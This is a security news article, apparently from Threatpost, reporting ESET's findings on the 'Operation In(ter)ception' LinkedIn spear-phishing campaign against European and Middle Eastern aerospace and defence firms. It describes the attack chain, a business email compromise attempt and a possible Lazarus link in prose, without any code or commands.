Attackers are impersonating human resource employees from Collins Aerospace and General Dynamics in a spear-phishing campaign leveraging LinkedIn’s messaging service. Targets are sent phony job offers that include malicious documents designed to fetch data-exfiltrating malware.
The spear-phishing messages were part of a widespread campaign, dubbed “Operation In(ter)ception,” which targeted victims at European and Middle East aerospace and military companies. Researchers believe the primary goal of the attacks, which occurred from September to December 2019, was espionage. However, in one case, attackers also tried to utilize a compromised victim’s email account in a business email compromise (BEC) attack, showing that they may also have financial motives.
The cyberattacks “were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware,” said researchers with ESET in a Wednesday analysis, shared at ESET Virtual World 2020. “To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the custom malware used in Operation In(ter)ception hasn’t been previously documented.”
Victims were first sent a job offer in a LinkedIn message from a “well-known company in a relevant sector.” These included Collins Aerospace (formerly Rockwell Collins), a major U.S. supplier of aerospace and defense products, and General Dynamics, another large U.S.-based corporation.
The “job offer” file was a password-protected RAR archive containing a LNK file. Once opened, the messages contained a seemingly-innocuous PDF document that showed salary information related to the fake job.
However, the PDF was a decoy: Behind the scenes, a Command Prompt utility (a command-line interface program used to execute commands in Windows) was executed to create a scheduled task. Here, attackers are making use of a Windows component called Task Scheduler, which provides the ability to schedule the launch of programs at pre-defined times. The scheduled task was set to execute a remote XSL script. XSL, or Extensible Stylesheet Language files, are commonly used for processing data within XML files.
The XSL script downloaded base64-encoded payloads, which were then decoded by a legitimate Windows utility, called certutil. Certutil is a command-line program used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates. Another Windows command line utility program was then used, called rundll32 (used for loading DLLs), to finally download and run a PowerShell DLL.
The abuse of these two legitimate, preinstalled Windows utilities by attackers is a common method called “living off the land,” used as a way to covertly carry out activity under the guise of regular activity.
Since the logging of executed PowerShell commands is disabled by default, researchers couldn’t retrieve the commands used by the malware. However, they found that the attackers queried the AD (Active Directory) server to obtain a list of employees, including administrator accounts, and subsequently performed password brute-force attacks on the administrator accounts.
Researchers also noted that attackers archived the collected data into a RAR file and used a custom build of dbxcli, a legitimate open-source command line client for DropBox users and admins.
“Based on the job titles of the employees initially targeted via LinkedIn, it appears that Operation In(ter)ception targeted technical and business-related information,” said researchers. However, “Neither the malware analysis nor the investigation allowed us to gain insight into what exact file types the attackers were aiming for.”
In one situation, attackers found communication (in the victim’s emails) between the victim and a customer regarding an unresolved invoice. The attackers followed up in the conversation, purporting to be the victim, and urged the customer to pay the invoice to a bad actor controlled bank account.
“Fortunately, the victim company’s customer became suspicious and reached out to the victim for assistance, thwarting the attackers’ attempt to conduct a so- called business email compromise attack,” said researchers.
Paul Rockwell, head of trust and safety with LinkedIn, said that the creation of a fake account or fraudulent activity with an intent to mislead or lie to LinkedIn members “is a violation of our terms of service.” He said, at this time the attacker owned accounts in question have been permanently restricted.
“We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members,” he said in a statement to Threatpost. “We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies. Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors.”
They said, while they did not find strong evidence connecting the attacks to a known threat actor, they did discover several hints suggesting a “possible link” to the Lazarus group, including similarities in targeting, development environment, and anti-analysis techniques used.
Researchers warn to keep an eye out for the staples of spear-phishing emails – such as suspicious attachments and spelling errors – that can even be found on LinkedIn.
“Our research into Operation In(ter)ception shows again how effective spearphishing can be for compromising a target of interest,” they said. “In the investigated cases, the adversaries used LinkedIn to select employees of the targeted military and defense companies and subsequently approached them with fake job offers. Unafraid of direct contact, the attackers chatted with the victims to convince them to open malicious files.”
Insider threats are different in the work-from home era. On June 24 at 2 p.m. ET, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, “The Enemy Within: How Insider Threats Are Changing.” Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it. Please register here for this Threatpost webinar.